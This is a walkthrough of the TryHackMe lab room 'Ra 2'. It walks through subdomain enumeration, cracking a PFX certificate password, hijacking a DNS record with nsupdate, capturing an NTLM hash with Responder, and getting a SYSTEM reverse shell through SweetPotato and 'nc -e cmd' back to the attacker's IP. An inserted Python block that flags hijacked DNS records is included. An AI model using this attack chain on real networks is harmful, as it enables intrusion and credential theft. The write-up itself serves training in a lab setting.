Ra 2 TryHackme Walkthrough
By Shamsher Khan. This is a writeup of the TryHackMe room “Ra 2”.
Room link: https://tryhackme.com/room/ra2
Note: This room is for Premium Members only (those who purchased a THM premium membership).
Difficulty: Hard
Room: Ra2
Created by: 4ndr34zz and theart42
Have you completed the Ra 1 room?
Enumeration
If you want to use nmap, I suggest:
nmap -p- -T4 -sC -sV -Pn -vvv 10.10.202.59
This scan can take a long time, maybe 30 or 45 minutes.
Let's visit 10.10.202.59 in the browser; it reveals http://fire.windcorp.thm/
Hostname
fire.windcorp.thm
Add it to the /etc/hosts file (as root):
echo "10.10.202.59 fire.windcorp.thm" >> /etc/hosts
Here I suspect this domain has more DNS names, so I check the TLS certificate.
I found two more DNS names:
selfservice.windcorp.thm
selfservice.dev.windcorp.thm
Add these to /etc/hosts as well.
The dig tool reveals our first flag.
gobuster dir -u https://fire.windcorp.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k
Visit https://fire.windcorp.thm/powershell
But we don’t have credentials.
gobuster dir -u https://selfservice.dev.windcorp.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k
We found a backup folder.
Download these files and check their content.
cert.pfx is password protected. Try to crack the password.
Crackpkcs12 Tool
crackpkcs12 is a tool to audit the passwords of PKCS#12 files (extension .p12 or .pfx). It’s written in C and uses the openssl library. It works on GNU/Linux and other UNIX systems. Its author is aestu and its license is GPLv3+, slightly modified to allow linking with the openssl library.
Windows servers use .pfx files that bundle a certificate (public key) with the associated private key. Let’s use crackpkcs12.
You can download it here.
tar -xf crackpkcs12*
cd crackpkcs12*
./configure
make
sudo make install
A simple dictionary attack:
crackpkcs12 -d rockyou.txt certificate.pfx
Extract the private key (unencrypted, because of -nodes):
openssl pkcs12 -in cert.pfx -nocerts -out private.pem -nodes
Extract the certificate (public key):
openssl pkcs12 -in cert.pfx -out public.pem -clcerts -nokeys
nsupdate
Since we know we can update DNS records without our machine being joined to the domain we’ll use nsupdate. Let’s send a request to delete the existing A record for selfservice.windcorp.thm and then send an update add request for a new A record to have selfservice resolve to our THM IP.
nsupdate
> server 10.10.168.132
> update delete selfservice.windcorp.thm
> send
> update add selfservice.windcorp.thm 1234 A 10.2.12.26
> send
> quit
Let’s try the dig tool.
Let’s query the DNS server to see if selfservice.windcorp.thm will now resolve to our THM IP when a client requests a lookup.
dig selfservice.windcorp.thm @10.10.168.132
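A defender’s counterpart to the dig check above, added here as example code that is not part of the original walkthrough: it parses dig’s ANSWER SECTION and compares each A record against a baseline of expected addresses, so a record rewritten through an unauthenticated dynamic update (as in the nsupdate step) shows up as a finding. The baseline address 10.10.168.132 and the sample dig output are constructed assumptions.

```python
import re
from typing import Dict, List, NamedTuple, Set


class DnsRecord(NamedTuple):
    name: str
    ttl: int
    rtype: str
    rdata: str


# One line of dig's ANSWER SECTION: "<name> <ttl> IN <type> <rdata>"
ANSWER_RE = re.compile(r"^(\S+)\s+(\d+)\s+IN\s+([A-Z]+)\s+(\S+)$")


def parse_dig_answers(dig_output: str) -> List[DnsRecord]:
    """Parse only the ANSWER SECTION of dig output into DnsRecord tuples."""
    records: List[DnsRecord] = []
    in_answer = False
    for line in dig_output.splitlines():
        line = line.strip()
        if line.startswith(";; ANSWER SECTION:"):
            in_answer = True
            continue
        if in_answer:
            if not line or line.startswith(";;"):
                break  # blank line or next section ends the answers
            m = ANSWER_RE.match(line)
            if m:
                name, ttl, rtype, rdata = m.groups()
                records.append(DnsRecord(name.rstrip(".").lower(), int(ttl), rtype, rdata))
    return records


def find_hijacked(records: List[DnsRecord], baseline: Dict[str, Set[str]]) -> List[str]:
    """Return a finding for every A record whose address is not in the baseline."""
    findings = []
    for r in records:
        if r.rtype != "A":
            continue
        expected = baseline.get(r.name)
        if expected is None:
            findings.append(f"{r.name}: no baseline entry for this name")
        elif r.rdata not in expected:
            findings.append(f"{r.name}: resolves to {r.rdata}, expected one of {sorted(expected)}")
    return findings


# Constructed sample: dig output after the A record was overwritten by nsupdate.
SAMPLE_DIG = """
; <<>> DiG 9.18.1 <<>> selfservice.windcorp.thm @10.10.168.132
;; ANSWER SECTION:
selfservice.windcorp.thm.\t1234\tIN\tA\t10.2.12.26

;; Query time: 3 msec
"""

# Assumed legitimate address for the name (constructed for this example).
BASELINE = {"selfservice.windcorp.thm": {"10.10.168.132"}}
```

Run the check periodically against the zone’s authoritative server; a legitimate record returns no findings, a rewritten one is reported with the unexpected address.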
Responder
Before you start responder you’ll want to copy the two files generated earlier (private.pem and public.pem) to /usr/share/responder/certs, or wherever the certs directory lives on your machine.
We’ll want to edit responder’s config for the HTTPS server.
Then edit /etc/responder/Responder.conf.
Fire up responder to listen on tun0.
Now visit this URL
https://selfservice.dev.windcorp.thm/backup/
We capture a request.
Save this hash to a file and crack it.
So we have credentials.
The server is not running SSH, but there is an alternative: WinRM on port 5985. WinRM is used for PowerShell remoting, where an authenticated user can access the server and submit commands. Using the evil-winrm tool, we can access the server semi-interactively.
Now log in here: https://fire.windcorp.thm/powershell
This makes us think of SweetPotato.
Now start a listener:
rlwrap nc -lvp 4444
.\SweetPotato.exe -p nc.exe -a "-e cmd 10.2.12.26 4444"
You can find me on:
LinkedIn:- https://www.linkedin.com/in/shamsher-khan-651a35162/
Twitter:- https://twitter.com/shamsherkhannn
Tryhackme:- https://tryhackme.com/p/Shamsher
For more walkthroughs stay tuned…
Before you go…
Visit my other walkthroughs:
and thank you for taking the time to read my walkthrough.